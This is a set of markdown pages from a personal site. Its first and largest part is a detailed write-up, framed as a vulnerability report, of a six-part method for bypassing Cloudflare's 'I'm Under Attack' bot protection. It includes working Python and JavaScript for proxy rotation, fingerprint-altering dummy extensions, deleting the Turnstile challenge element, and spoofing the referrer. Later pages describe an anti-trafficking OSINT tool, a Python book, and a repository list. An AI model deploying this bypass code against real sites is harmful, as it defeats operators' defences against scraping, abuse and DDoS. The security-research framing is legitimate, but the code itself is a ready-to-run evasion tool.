In the following sections, I will detail the technical details of each component, hereon referred to as “techniques”, of this comprehensive bypass method. The following will explore how these techniques work individually and, more importantly, how their combination creates a synergistic effect that successfully circumvents IUAM's multi-layered defenses. This analysis will cover the underlying principles, implementation details, and the rationale behind each aspect of the bypass method.

Understanding the intricacies of this vulnerability is crucial not only for addressing the immediate security concern but also for insights into potential improvements in anti-bot technologies. The sophistication of this multi-part bypass method highlights the ongoing challenges in the field of web security and the constant evolution required to stay ahead of potential threats.

**Technique \#1: Rotating Residential Proxies**

**Overview**  
The use of rotating residential proxies is a critical component of this multi-part bypass method. This technique is particularly effective due to its ability to mimic legitimate user traffic, making it difficult for Cloudflare's security systems to distinguish between authentic users and automated requests.

**Why It's Effective**

* **IP Diversity:** Residential proxies provide access to a wide range of IP addresses associated with real Internet Service Providers (ISPs). This diversity makes it challenging for Cloudflare to identify and block traffic based on IP reputation alone.  
* **Geographical Distribution:** Residential proxies are typically spread across various geographical locations. This distribution helps in bypassing any geolocation-based filtering that Cloudflare might employ.  
* **Legitimate IP Reputation:** Unlike data center IPs, which are often flagged as potential sources of automated traffic, residential IPs generally have a better reputation. They are less likely to be pre-emptively blocked or subjected to stringent challenges.  
* **Dynamic Nature:** The rotating aspect of these proxies means that each request can potentially come from a different IP address. This rotation makes it difficult for Cloudflare to detect patterns typically associated with automated access from a single source.  
* **Believable User Behavior:** When combined with appropriate request timing and browsing patterns, requests through residential proxies can closely mimic the behavior of real users accessing the site from home networks.  
* **Bypass Rate Limiting:** Cloudflare's rate limiting is often based on the IP address specifically. Rotating proxies effectively distribute requests across multiple IPs, potentially bypassing these limits.  
* **Evasion of IP-Based Challenges:** Cloudflare increases the challenge difficulty for IPs exhibiting suspicious behavior. Rotating the residential proxies reduces the likelihood of any single IP accumulating enough 'suspicion' to trigger enhanced challenges.

**Implementation Code**

| from fp.fp import FreeProxy def random\_proxy(from\_list=False):     if from\_list:         good\_proxies \= read\_json("good\_proxies.json")\["proxies"\]         if len(good\_proxies) \> 0:             return random.choice(good\_proxies)     try:         return FreeProxy(rand=True, country\_id=\['CA'\], https=True, timeout=4).get() \# Default search     except:         sleep(5)         try:             return FreeProxy(rand=True, country\_id=\['US', 'CA'\], https=True, timeout=6).get() \# Expand search         except:             sleep(4)             return FreeProxy(rand=True, timeout=10).get() \# At this point, any proxy will do |
| :---- |

**Code Breakdown**

* **Proxy Source Flexibility:** The function first checks if it should use a predefined list of "good" proxies, allowing for the use of known reliable proxies. If not using the predefined list, it attempts to fetch a random proxy using the FreeProxy library.  
* **Geographical Targeting:** The initial attempt focuses on Canadian (CA) proxies, which may have a good reputation and lower likelihood of being blocked. If that fails, it expands to include US proxies, increasing the pool while still maintaining a North American focus.  
* **Fallback Mechanism:** If both targeted attempts fail, it resorts to fetching any available proxy globally.  
* **Error Handling and Retries:** The code includes waiting (i.e. sleep) intervals between attempts, reducing the likelihood of triggering rate limits on the proxy service. Multiple try-except blocks ensure that the function almost always returns a proxy, enhancing reliability.  
* **HTTPS and Timeout Configuration:** The code specifically requests HTTPS proxies, which is crucial for accessing most modern websites, especially those protected by Cloudflare. Timeout values are set and increased in subsequent attempts, balancing between speed and the likelihood of finding a working proxy.

**Technique \#2: Usage of The Selenium-Driverless Library**

**Overview**  
This technique involves using a heavily modified version of Selenium that interacts directly with the Chrome DevTools Protocol, allowing for browser automation that closely mimics human-like behavior and bypasses common bot detection mechanisms.

**Why It's Effective**

* **Evasion of WebDriver Detection:** Traditional Selenium uses WebDriver, which leaves detectable traces. Selenium-driverless operates without WebDriver, making it much harder for anti-bot systems to detect automation. Cloudflare's IUAM often checks for the presence of WebDriver to identify automated browsers. Selenium-driverless bypasses this check effectively.  
* **Authentic Browser Fingerprint:** By controlling a fully installed Chrome instance, Selenium-driverless presents a genuine browser fingerprint, complete with all the expected properties and behaviors of a real Chrome browser. This authentic fingerprint is crucial in bypassing Cloudflare's sophisticated browser integrity checks.  
* **JavaScript Execution:** Selenium-driverless fully supports JavaScript execution, allowing it to interact with and pass Cloudflare's JavaScript-based challenges seamlessly. It can handle dynamic content and complex AJAX requests, which are often used in IUAM's verification process.  
* **Mimicking Human-like Interactions:** The library allows for the implementation of realistic mouse movements, typing patterns, and navigation behaviors that closely resemble human actions. These human-like interactions are critical in bypassing behavioral analysis algorithms employed by Cloudflare.  
* **Header and Cookie Management:** Selenium-driverless provides fine-grained control over HTTP headers and cookies, allowing for the maintenance of consistent session data. This control is essential for navigating through Cloudflare's multi-step verification process without triggering suspicion.  
* **Stealth Capabilities:** The library can be configured to mask common automation indicators, such as user agent strings, screen dimensions, and other browser characteristics. This stealth approach helps in evading Cloudflare's fingerprinting techniques that look for more obvious signs of automation.  
* **Performance Advantages:** Selenium-driverless often performs faster than traditional Selenium, allowing for more efficient large-scale operations against Cloudflare-protected sites. The improved performance helps in maintaining a natural browsing speed, further enhancing the appearance of legitimate traffic.

**Technique \#3: Strictly Avoiding "Headless" Mode**

**Overview**  
Headless browsers, which operate without a graphical user interface, are commonly used in web scraping and automation tasks due to their lower resource requirements. However, in the context of bypassing sophisticated anti-bot systems like Cloudflare's IUAM, using a full browser instance with a complete graphical rendering pipeline is essential.

This technique involves running the browser in its standard mode, complete with full rendering capabilities, just as it would appear on a user's screen. By doing so, the automated browsing session presents itself as indistinguishable from a genuine user interaction from Cloudflare's perspective.

**Why It's Effective**

* **Evasion of Headless Detection:** Cloudflare, like many advanced anti-bot systems, has specific checks to detect headless browser usage. By avoiding headless mode, this bypass technique circumvents these detection mechanisms entirely. Many of the more obvious signs of headless browsers, such as missing or default values for certain browser properties, are avoided when using a full browser instance.  
* **Complete Browser Fingerprint:** A full browser instance provides a complete and authentic browser fingerprint, including properties related to screen resolution, color depth, and graphics capabilities. This comprehensive fingerprint is crucial in passing Cloudflare's browser environment checks.  
* **Realistic Rendering Behavior:** Non-headless browsers fully execute CSS and render the page, which can be detected by sophisticated fingerprinting techniques. Some anti-bot systems use techniques like invisible elements or CSS-based traps to detect if a page is being fully rendered. A complete browser passes these tests naturally.  
* **JavaScript Execution Environment:** Full browsers provide a complete JavaScript execution environment, including access to all standard Web APIs. This ensures that any JavaScript-based challenges or checks by Cloudflare are executed in an environment indistinguishable from a real user's browser..  
* **Support for Advanced Web Features:** Features like WebGL, which are sometimes used in advanced fingerprinting techniques, are fully supported in non-headless modes. Cloudflare may use checks for these advanced features to distinguish between real and automated browsers.  
* **Realistic Resource Loading:** Full browsers load all resources, including images, stylesheets, and scripts, in a manner consistent with real user behavior. This complete resource loading process can be crucial in passing certain types of behavioral analysis employed by anti-bot systems.  
* **Compatibility with Browser Extensions:** Standard browser modes allow for the use of extensions, which can be an important part of creating a realistic and diverse browser profile. The presence and behavior of certain extensions can contribute to the overall appearance of a legitimate user session.

**Technique \#4: Crafting and Employing Custom Dummy Browser Extensions**

**Overview**  
The core idea of this novel technique is to manipulate the browser's fingerprint by introducing unique, dynamically generated extensions. This approach exploits the fact that Cloudflare's fingerprinting algorithm appears to consider installed browser extensions when generating a browser fingerprint.

By creating a dummy extension with a randomly generated name and description for each session, this technique aims to present a unique browser profile to Cloudflare's detection systems, making each automated session appear as a distinct, legitimate user.

**Why It's Effective**

* **Unique Fingerprint Generation:** Each randomly generated extension creates a unique aspect of the browser's fingerprint, making it more challenging for Cloudflare to correlate multiple requests coming from the same automated source.  
* **Mimicking Diverse User Behavior:** Real users often have various extensions installed. By generating random extensions, this technique simulates the diversity seen in genuine user browsers.  
* **Evasion of Pattern Recognition:** The randomness in extension names and descriptions helps avoid any pattern that Cloudflare might use to identify automated or repetitive browsing behavior.  
* **Exploitation of Fingerprinting Limitations:** This technique takes advantage of the fact that fingerprinting algorithms often treat the presence and details of extensions as a signal of browser uniqueness.  
* **Dynamic Session Characteristics:** By changing the extension for each session, it creates a dynamic browsing environment that appears to be a new, unique user each time, even if other factors remain constant.  
* **Minimal Performance Impact:** These dummy extensions have no actual functionality, ensuring that they don't interfere with the browsing process or add unnecessary overhead.  
* **Customizable Complexity:** The technique allows for adjusting the complexity of the generated extensions, potentially creating more sophisticated dummy extensions if needed to bypass more advanced detection methods.

**Implementation Code**

| import os  import json  import random  import names def generate\_random\_extension():     try:         \# Define the extension directory         extension\_dir \= "resources/dummy\_extension"                  \# Create the directory if it doesn't exist         if not os.path.exists(extension\_dir):             os.makedirs(extension\_dir)                  \# Generate random name for the extension         extension\_name \= " ".join(\[names.get\_first\_name(), names.get\_first\_name(), names.get\_last\_name()\])                  \# Generate random description with 5-10 names         description \= " ".join(\[names.get\_full\_name() for \_ in range(random.randint(5, 10))\])                  \# Create manifest.json content         manifest\_content \= {             "manifest\_version": 3,             "name": extension\_name,             "version": "1.0",             "description": description,             "background": {                 "service\_worker": "background.js"             },             "permissions": \[\]         }                  \# Write manifest.json         manifest\_path \= os.path.join(extension\_dir, "manifest.json")         with open(manifest\_path, 'w') as manifest\_file:             json.dump(manifest\_content, manifest\_file, indent=4)                  \# Create an empty background.js file         background\_js\_path \= os.path.join(extension\_dir, "background.js")         with open(background\_js\_path, 'w') as background\_js\_file:             background\_js\_file.write("// Empty background script\\n")                  return True     except Exception as e:         print(f"Error: {e}")         return False |
| :---- |

**Code Breakdown**

* **Import Statements:** The code uses standard Python libraries (os, json, random) and a third-party library (names) for generating random names.  
* **Function Definition:** generate\_random\_extension() is the main function that creates the dummy extension.  
* **Extension Directory Setup:** Defines a directory path for the extension and creates it if it doesn't exist.  
* **Random Name Generation:** Uses the names library to generate a random three-part name for the extension.  
* **Random Description Generation:** Creates a description by combining 5-10 random full names.  
* **Manifest Creation:** Constructs a dictionary representing the manifest.json file required for browser extensions. It uses Manifest V3, the latest standard for browser extensions. It includes basic required fields: name, version, description. Additionally, it specifies an empty background script, giving the appearance of functionality without actual operations.  
* **File Writing:** Writes the generated manifest content to a manifest.json file in the extension directory. It creates an empty *background.js* file, further simulating a real extension.  
* **Error Handling:** Wraps the entire process in a try-except block to handle any potential errors during extension creation.  
* **Return Value:** Returns True if the extension is successfully created, False otherwise.

**Technique \#5: Hit It With a Hammer**

**Overview**  
The "Hit It With a Hammer" technique is another novel approach to bypassing Cloudflare's "I'm Under Attack" Mode (IUAM) challenge, particularly when faced with the "I'm not a robot" button. This method exploits a vulnerability in how Cloudflare handles the challenge when certain elements are removed from the page. Instead of solving the challenge conventionally, this technique forcibly removes the challenge element, causing Cloudflare to repeatedly refresh the challenge until it eventually allows access as if the challenge was legitimately solved.

**Why It's Effective**

* **Bypasses Interaction Requirement:** Eliminates the need to interact with the "I'm not a robot" button, which is typically difficult for automated systems to click due to its placement in a closed shadow DOM.  
* **Exploits Challenge Refresh Mechanism:** Forces Cloudflare's system to continuously refresh the challenge, seemingly confusing the protection mechanism.  
* **High Success Rate:** Works 99% of the time within two cycles, making it a reliable bypass method.  
* **Adaptability:** Includes a fallback mechanism (rotating proxies and extensions) for the very rare cases when the initial attempt fails.  
* **Simplicity in Execution:** Relies on basic DOM manipulation, which is easier to implement than complex challenge-solving algorithms.  
* **Avoids Pattern Recognition:** The forceful removal of elements is suspected to be harder for Cloudflare to detect as a pattern compared to consistent, predictable challenge-solving behavior.  
* **Scalability:** Can be easily integrated into larger automated systems due to its programmatic nature.

**Implementation Code**

| import asyncio from selenium\_driverless import webdriver import json import random import re import time from time import sleep import base64 async def cloudflare\_bypass(driver, current\_url):     try:         print("Starting Cloudflare bypass...")         initial\_page\_source \= await driver.page\_source         if "you have been blocked" in initial\_page\_source:             print("Blacklisted by cloudflare. Try a different proxy.")             return None         if ("erify you are human" in initial\_page\_source) or ("erifying you are human" in initial\_page\_source):             print("Cloudflare page detected.")             attempts \= 0             while attempts \< 2:                 print("Attempting to remove Turnstile wrapper element...")                 remove\_script \= """                 var element \= document.getElementById('turnstile-wrapper');                 if (element) {                     element.parentNode.removeChild(element);                     console.log('Turnstile wrapper element removed');                     return true;                 } else {                     console.log('Turnstile wrapper element not found');                     return false;                 }                 """                 result \= await driver.execute\_script(remove\_script)                                  if result:                     print("Turnstile wrapper element successfully removed.")                 else:                     print("Failed to remove the element. Trying a different way...")                     remove\_script \= """                     var elements \= document.getElementsByClassName('spacer');                     if (elements.length \> 0\) {                         elements\[0\].parentNode.removeChild(elements\[0\]);                         console.log('Turnstile wrapper element removed');                         return true;                     } else {                         console.log('Turnstile wrapper element not found');                         return false;                     }                     """                     result \= await driver.execute\_script(remove\_script)                     if result:                         print("Turnstile wrapper element successfully removed.")                     else:                         print("Failed to remove Turnstile wrapper element. Element might not exist or have a different ID.")                                  \# Wait a bit for any potential page updates                 await asyncio.sleep(8)                                  \# Check if the challenge is completed                 new\_page\_source \= await driver.page\_source                 if "erify you are human" not in new\_page\_source and "erifying you are human" not in new\_page\_source:                     print("Cloudflare challenge appears to be bypassed successfully.")                     return driver                 else:                     print("Cloudflare challenge may still be active. Trying again")                     attempts \+= 1             print("Cloud not bypass. Returning driver as None.")             return None         else:             print("No Cloudflare page detected. Moving on.")                  return driver     except Exception as e:         print(f"Error bypassing Cloudflare: {e}")     return driver |
| :---- |

**Code Breakdown**

* **Initial Check:** The function first checks if the page source contains indicators of being blocked or facing a Cloudflare challenge.  
* **Challenge Detection:** Looks for phrases like "verify you are human" or "verifying you are human" to identify the Cloudflare challenge page, but without the starting “v” character, to remain case insensitive.  
* **Element Removal Attempt:** The code attempts to remove the Turnstile wrapper element (Cloudflare's challenge container) using JavaScript. It first tries to find an element with the ID 'turnstile-wrapper'. If that fails, it attempts to remove an element with the class 'spacer'.  
* **Multiple Attempts:** The removal process is attempted up to two times.  
* **Waiting Period:** After each removal attempt, the code waits for 8 seconds, specifically in the code *await asyncio.sleep(8)*, to allow for any page updates or refreshes.  
* **Success Check:** After waiting, it checks if the challenge phrases are no longer present in the page source. If the phrases are gone, it considers the bypass successful and returns the driver.  
* **Fallback and Reporting:** If the bypass fails after two attempts, it returns None, indicating failure. Various print statements throughout the function provide debugging information about the process.  
* **Error Handling:** The entire process is wrapped in a try-except block to catch and report any unexpected errors.

**Technique \#6: Using a Random URL as a Referrer**

**Overview**  
This technique involves manipulating the HTTP referrer header to make the traffic appear more legitimate to Cloudflare's "I'm Under Attack" Mode (IUAM) protection. The method works by first navigating to a neutral site (like *http://example.com*), then using injected JavaScript to redirect to the target site while setting a random URL as the referrer. This approach aims to mimic the behavior of a user naturally navigating from one site to another, rather than directly accessing the protected site.

**Why It's Effective**

* **Mimics Natural Browsing Behavior:** By simulating a user coming from another site, it appears more like natural web browsing behavior rather than a direct bot attack.  
* **Diversifies Traffic Patterns:** Random referrers make it harder for Cloudflare to identify patterns typically associated with automated access.  
* **Bypasses Direct Access Flags:** Some protection systems flag direct access to protected pages as suspicious. A referrer suggests the user found the link elsewhere.  
* **Complicates Traffic Analysis:** Varied referrers make it more challenging for security systems to correlate multiple requests as coming from the same source.  
* **Emulates Search Engine Traffic:** Random referrers can make the traffic appear similar to users coming from search engine results, which is typically considered legitimate.  
* **Adds Realism to Automated Requests:** In combination with other techniques, this adds another layer of 'realism' to the automated requests, making them harder to distinguish from genuine user traffic.

**Implementation Code**

| from selenium\_driverless import webdriver import asyncio import os from time import sleep async def access\_site\_via\_bypass(url):     \# Get a random proxy     this\_proxy \= random\_proxy()     print("Using proxy:", this\_proxy)     options \= webdriver.ChromeOptions()     options.add\_argument('--proxy-server=%s' % this\_proxy)     generate\_random\_extension()     options.add\_argument(f"--load-extension={os.path.abspath('resources/dummy\_extension')}")     \# Allow all third-party cookies     options.add\_argument("--disable-features=SameSiteByDefaultCookies")     options.add\_argument("--disable-features=CookiesWithoutSameSiteMustBeSecure")     async with webdriver.Chrome(options=options) as driver:         try:             await driver.get("https://example.com", wait\_load=True)             page\_source \= await driver.page\_source             sleep(3)             if "Example" not in page\_source:                 return "Try a different proxy"             \# Use JavaScript to change the referrer and navigate to the final URL             script \= f"""             Object.defineProperty(document, 'referrer', {{get: () \=\> '{random\_url()}'}});             window.location.href \= "{url}";             """             await driver.execute\_script(script)                          await asyncio.sleep(6)             \# Handle Cloudflare challenge             driver \= await cloudflare\_bypass(driver, url)             if driver is None:                 return "Try a different proxy"             page\_source \= await driver.page\_source             if "been blocked" in page\_source:                 return "Try a different proxy"             \# Access the site directly from here         except Exception as e:             print(f"An error occurred: {e}")             return "An error occurred" |
| :---- |

**Code Breakdown**

* **Initial Navigation:** The code *await driver.get("https://example.com", wait\_load=True)*  navigates to a neutral site (*example.com*) first. This step is crucial as it sets up a realistic browsing scenario.  
* **Verifying Successful Load:** Checks if "Example" is in the page source to ensure the initial page loaded correctly. If not, it suggests trying a different proxy, which is part of the broader evasion strategy.  
* **Referrer Manipulation and Redirection:** A JavaScript snippet is prepared to modify the document's referrer and redirect to the target URL. The *Object.defineProperty(document, 'referrer', {{get: () \=\> '{random\_url()}'}});* line overwrites the default referrer property of the document with a getter that returns a random URL. The *window.location.href \= "{url}";* line performs the actual redirection to the target URL.  
* **Executing the Script:** The line *await driver.execute\_script(script)* executes the prepared JavaScript in the context of the current page.  
* **Handling Post-Redirect:** The line *await asyncio.sleep(6)* waits for 6 seconds, allowing time for the redirection and any initial Cloudflare checks to occur, and the line *driver \= await cloudflare\_bypass(driver, url)* uses the “Hit It With a Hammer” technique that was previously detailed in this report.  
* **Final Check:** Verifies that the page hasn't been blocked by Cloudflare after the redirection and bypass attempt.

**Conclusion**

The six-part technique approach detailed in this report represents a sophisticated and alarmingly effective method for bypassing Cloudflare's "I'm Under Attack" Mode (IUAM) protection. By combining multiple strategies, this approach creates a synergistic effect that renders Cloudflare's advanced security measures largely ineffective.

**Synergy of Techniques**

* **Rotating Residential Proxies:** Provides a constantly changing, geographically diverse set of IP addresses that appear as legitimate user traffic.  
* **Selenium-Driverless Library:** Emulates real browser behavior, bypassing common automation detection methods.  
* **Avoiding Headless Mode:** Presents a full browser environment, complete with all the characteristics Cloudflare checks for in identifying real users.  
* **Custom Dummy Browser Extensions:** Alters the browser fingerprint dynamically, making each session appear unique.  
* **"Hit It With a Hammer":** Provides a last-resort method to bypass challenges when other techniques fail to prevent detection.  
* **Random URL as Referrer:** Simulates natural browsing patterns, making automated access appear as legitimate traffic from various sources.

When combined, these techniques create a formidable, very successful bypass method:

* The use of residential proxies with random referrers makes the traffic appear to come from diverse, legitimate sources.  
* The Selenium-driverless library in non-headless mode presents a convincing browser environment that can handle complex JavaScript and render pages fully.  
* Custom extensions further differentiate each session, while the "Hit It With a Hammer" technique provides a fallback for dealing with direct challenges.

This layered approach addresses multiple aspects of Cloudflare's detection mechanisms simultaneously, making it extremely difficult for the protection system to identify the traffic as automated.

**Impact on Cloudflare's Protection Efficacy**  
The discovery and implementation of this bypass method have severe implications for the efficacy of Cloudflare's IUAM protection:

* **Undermined Core Security Feature:** IUAM is often the last line of defense against automated attacks. Its bypass fundamentally compromises Cloudflare's security offering.  
* **Scalable Threat:** The method's high success rate (reported 99% effectiveness) and its ability to be automated at scale present a significant threat to websites relying on Cloudflare for protection.  
* **Broad Applicability:** The techniques used are not specific to any particular website, potentially affecting a wide range of Cloudflare-protected sites.  
* **Challenge to Bot Detection Paradigms:** This bypass demonstrates the limitations of current bot detection methods, calling for a reevaluation of anti-automation strategies.  
* **Potential for Abuse:** In the wrong hands, this method could be used for large-scale scraping, DDoS attacks, or other malicious activities that Cloudflare is designed to prevent.  
* **Erosion of Trust:** The existence of such a reliable bypass could erode trust in Cloudflare's services, potentially impacting their market position and the security posture of their clients.

---

<!-- FILE: prospector.md -->

# Prospector

## The Crisis of Human Trafficking in the United States

Human trafficking, often referred to as modern-day slavery, represents a growing crisis in the United States. A type of human trafficking is sex trafficking, which involves the exploitation of individuals for commercial sexual activities through force, fraud, or coercion. Alarmingly, this crime has been reported in all 50 states, victimizing thousands of people, including minors, each year.

The internet has significantly increased the scale of this problem. Online platforms provide traffickers with new reach and anonymity, enabling them to exploit victims on a much larger scale. This digital shift has propelled sex trafficking to become one of the fastest-growing criminal industries globally. Statistics paint a grim picture: the average age of entry into sex trafficking is just 15 years old for females. Perhaps more disturbingly, 55% of survivors report attending school during their exploitation, highlighting how this crime operates within plain sight.
[Source](https://guardiangroup.org/what-is-trafficking/)

## Guardian Group's Project 1591

Guardian Group's [Project 1591](https://www.project1591.us/), named after the U.S. Code criminalizing child sex trafficking, stands at the forefront of this battle. The initiative leverages Open Source Intelligence (OSINT) to identify potential victims of this heinous crime. Their team of skilled analysts and crowdsourced volunteers meticulously sift through publicly available information to identify and locate victims, gathering crucial evidence for law enforcement to act.

However, the sheer volume of data poses a significant challenge. With an estimated 150,000 new escort ads posted online daily in the United States, the task of manual analysis becomes overwhelmingly time-consuming. The limited number of trained analysts with high level OSINT skills makes their time an incredibly valuable and finite resource.
[Source](https://guardiangroup.org/what-is-trafficking/)

## Prospector™: An Autonomous OSINT Tool

Recognizing the need to maximize the efficiency of these skilled analysts, I developed Prospector™, an autonomous OSINT tool designed specifically for Guardian Group's Project 1591 program and their internal Analyst Team. Prospector™ serves as an assistant in the fight against human trafficking, reducing the time analysts need to spend sifting through thousands of online escort advertisements.

Prospector™ works by autonomously filtering through vast numbers of online ads, employing sophisticated algorithms and novel technology to identify potential instances of human trafficking. The tool generates comprehensive reports for individual cities, utilizing various OSINT techniques to determine the likely identity of potential victims. By automating a part of the initial triaging process, Prospector allows analysts to dedicate more of their valuable time to in-depth verification and investigation of the most promising leads.

"It’s volunteers like Mr. Campi that help us recognize the power of technology to cut through the white noise throughout the internet. He completed our volunteer training and gained access to Project 1591. He quickly realized the work wasn’t within his wheelhouse and that he felt he had a unique skillset to help us in a different way, having seen the sheer volume of what our internal Analysis Team and other volunteers are up against daily. He proceeded to build a proprietary tool for us and we are forever grateful for his work. It will definitely impact our support to law enforcement and more importantly help us find those potential victims quicker" said Guardian Group COO.

## Thank You, Guardian Group

The development of Prospector for Guardian Group has been an incredibly rewarding project. Over several months, I had the privilege of volunteering my time and expertise to create this tool, and I am very grateful to Guardian Group for providing this unique opportunity to contribute to their mission.

I extend my heartfelt thanks to those at Guardian Group for their partnership throughout the development of this innovative tool. Working with them has been very fulfilling, and I look forward to seeing how Prospector will assist their analysts in the future.

## Volunteer with Project 1591

Project 1591 is the first-ever 24/7 crowdsourcing process and platform that enables volunteers to become force multipliers to Guardian Group's mission of illuminating child victims of sex trafficking in the United States. Dedicate your time and expert OSINT skills and [volunteer today](https://www.project1591.us/). Your skills could be used to make a lifesaving impact on a victim of human trafficking right here in the United States.

---

<!-- FILE: python-fundamentals.md -->

# Python Fundamentals

## Details

- Publishing date: April 9th, 2024
- Available At: [amazon.com](https://www.amazon.com/Python-Fundamentals-Featuring-practical-challenges/dp/B0D1HP7TYV)
- Page Count: 112

## Overview

This book is designed to teach you everything you need to know about Python, presented in a straightforward manner with easy-to-understand examples and no fluff. It's the way I wish Python was taught to me when I first started learning.

## Why This Book Was Written

I created this book to provide a comprehensive and beginner-friendly resource for learning Python. I believe that learning programming should be accessible to everyone, and I wanted to create a resource that cuts through the noise and focuses on the essential concepts and practical examples.

## Book Style and Approach

Python Fundamentals is written in a clear and concise style, with a focus on practical examples and hands-on learning. Each chapter builds upon the previous one, gradually introducing new concepts and techniques. The book is suitable for beginners with no prior programming experience, as well as those who want to solidify their Python skills.


## By The End of This Book ...

... you will have a solid foundation of Python, data structures, object-oriented programming, and API interactions. You will be comfortable enough to write your own program using artifical intelligence natural language processing and interactions via the OpenAI LLM API, which is a great achievement!


## Chapter Overviews

1. Your First "Hello, World!" Program: Get started with Python by writing your first program and understanding the basic structure of a Python script.

2. Variables and Data Types: Learn about variables, data types, and how to store and manipulate data in Python.

3. Conditional Statements and Logical Operators: Discover how to make decisions in your programs using conditional statements and logical operators.

4. Loops: While, For, Break, and Continue: Master the art of repetition and iteration using while loops, for loops, and the break and continue statements.

5. Functions, Definitions, Arguments, Returns, and Calls: Understand how to define and use functions, pass arguments, and return values.

6. Libraries and Packages: Built-in Modules, Importing, and Pip3: Explore Python's rich ecosystem of libraries and packages, and learn how to import and use them in your projects.

7. More Data Types: Lists, Tuples, and Dictionaries: Dive deeper into Python's built-in data structures and learn how to work with lists, tuples, and dictionaries.

8. File I/O: Reading and Writing Files: Learn how to read from and write to files using Python's built-in file handling capabilities.

9. Exception Handling: Try, Except, Finally, and User Defined: Discover how to handle errors and exceptions gracefully in your Python programs.

10. Object-Oriented Programming: Classes and Objects: Understand the principles of object-oriented programming and learn how to define and use classes and objects in Python.

11. Regular Expressions: Master the power of regular expressions for pattern matching and text manipulation.

12. Storage: Working with JSON and CSV Files: Learn how to work with JSON and CSV files for data storage and exchange.

13. Flask: Introduction, Folder Structure, Routes, and Render Templates: Get started with web development using the Flask framework, and learn about its folder structure, routes, and template rendering.

14. Multithreading and Multiprocessing: Explore parallel programming techniques using Python's multithreading and multiprocessing modules.

15. Requests: Working with JSON-based APIs: Learn how to make HTTP requests and work with JSON-based APIs using the Requests library.

16. OpenAI API: Introduction, and Completions.Create: Discover how to interact with the OpenAI API and generate text using the Completions.Create endpoint.

---

<!-- FILE: public-repos.md -->

# Public repositories

This page is the index of public, non-fork repositories on [github.com/andrewcampi](https://github.com/andrewcampi). Repositories GitHub marks as forks are omitted. A one-line description is the published GitHub description, shortened when the original was a paragraph. "No description published" means the GitHub repo had none. This page does not invent what those repos do.

[VulnMap](https://andrewcampi.com/wiki/vulnmap.md) has a write-up and no public repository. The longer project notes are linked in the first table and in the sidebar.

## Documented on this site

| Repository | What it is | Language | Notes |
| --- | --- | --- | --- |
| [system1_server](https://github.com/andrewcampi/system1_server) | OpenAI-compatible server for local, batched, Jev-style decisions. | Python | [Notes](https://andrewcampi.com/wiki/system1-server.md) |
| [cecropia](https://github.com/andrewcampi/cecropia) | A self-hosted catalog for the GGUF models you decide are worth keeping. | Python | [Notes](https://andrewcampi.com/wiki/cecropia.md) |
| [ollama-auth-proxy](https://github.com/andrewcampi/ollama-auth-proxy) | An HTTPS proxy for Ollama that requires an API key. | Python | [Notes](https://andrewcampi.com/wiki/ollama-auth-proxy.md) |
| [vessel_sdk](https://github.com/andrewcampi/vessel_sdk) | Official Python client for the Vessel platform. | Python | [Notes](https://andrewcampi.com/wiki/vessel-sdk.md) |
| [albert](https://github.com/andrewcampi/albert) | An AI with memory, mood, an Ubuntu terminal, and Slack questions. | Python | [Notes](https://andrewcampi.com/wiki/albert.md) |
| [nexal](https://github.com/andrewcampi/nexal) | A language for token-efficient, AI-native communication. | Python | [Notes](https://andrewcampi.com/wiki/nexal.md) |
| [roadrunner-inference](https://github.com/andrewcampi/roadrunner-inference) | SVD adaptive routing that speeds up transformer inference without retraining. | Python | [Notes](https://andrewcampi.com/wiki/roadrunner.md) |
| [mind-virus](https://github.com/andrewcampi/mind-virus) | A psychological experiment in subtle AI persuasion. | Python | [Notes](https://andrewcampi.com/wiki/mind-virus.md) |
| [natural](https://github.com/andrewcampi/natural) | CLI that turns natural language into Ubuntu commands via Groq, then optionally runs them. | Python | [Notes](https://andrewcampi.com/wiki/natural.md) |
| [TLDS](https://github.com/andrewcampi/TLDS) | Too Lazy; Didn't Search, a SearchGPT-style UI. | HTML | [Notes](https://andrewcampi.com/wiki/tlds.md) |
| [doris](https://github.com/andrewcampi/doris) | An AI librarian demo covering agents, RAG, Streamlit, and tool calls. | Python | [Notes](https://andrewcampi.com/wiki/doris.md) |
| [atom](https://github.com/andrewcampi/atom) | A GPT-4 pentesting assistant for attack-surface mapping, CVE research, and command generation. | Python | [Notes](https://andrewcampi.com/wiki/atom.md) |

## Other public repositories

| Repository | What it is | Language |
| --- | --- | --- |
| [PyRandomX](https://github.com/andrewcampi/PyRandomX) | Python implementation of RandomX. | Python |
| [pywebiosecure](https://github.com/andrewcampi/pywebiosecure) | A pywebio 1.7 derivative that adds HTTPS. | Python |
| [coffee_shop](https://github.com/andrewcampi/coffee_shop) | Demo project. | Python |
| [otto_agent](https://github.com/andrewcampi/otto_agent) | Otto, a Python coding agent with file and terminal tools. | Python |
| [ai_lab_displays](https://github.com/andrewcampi/ai_lab_displays) | No description published. | Python |
| [arc_agent](https://github.com/andrewcampi/arc_agent) | No description published. | Python |
| [docker-on-rocky](https://github.com/andrewcampi/docker-on-rocky) | No description published. | Shell |
| [arc_prize_tasks_2025](https://github.com/andrewcampi/arc_prize_tasks_2025) | No description published. | — |
| [crewai_docs](https://github.com/andrewcampi/crewai_docs) | No description published. | — |
| [DotScrape](https://github.com/andrewcampi/DotScrape) | A small language that turns natural-language scrape steps into Python Selenium code. | Python |
| [open-perplexity](https://github.com/andrewcampi/open-perplexity) | A Perplexity-style search UI built with OpenAI web search and GPT-4o-mini. | HTML |
| [brave-driverless](https://github.com/andrewcampi/brave-driverless) | No description published. | Python |
| [selenium_chat](https://github.com/andrewcampi/selenium_chat) | Chat with the Selenium docs. | Python |
| [Baseball-Source-Code](https://github.com/andrewcampi/Baseball-Source-Code) | Source for a baseball game written in C#. | C# |
| [Squid-Guys-Source-Code](https://github.com/andrewcampi/Squid-Guys-Source-Code) | Source for the game Squid Guys, written in C#. | C# |
| [thatsthem](https://github.com/andrewcampi/thatsthem) | Unofficial Python client for That's Them. | Python |
| [CRAD-F](https://github.com/andrewcampi/CRAD-F) | Creative Reasoning and Direction Following, a benchmark for LLMs. | — |
| [airllm-test](https://github.com/andrewcampi/airllm-test) | No description published. | Jupyter Notebook |
| [ai-soc-analyst](https://github.com/andrewcampi/ai-soc-analyst) | No description published. | Shell |
| [atom_pro](https://github.com/andrewcampi/atom_pro) | No description published. | Python |
| [ArpScanPlus](https://github.com/andrewcampi/ArpScanPlus) | No description published. | Python |
| [pywebio-starter](https://github.com/andrewcampi/pywebio-starter) | No description published. | Python |
| [web_driver_server](https://github.com/andrewcampi/web_driver_server) | A server that navigates a URL and returns the rendered page source. | Python |
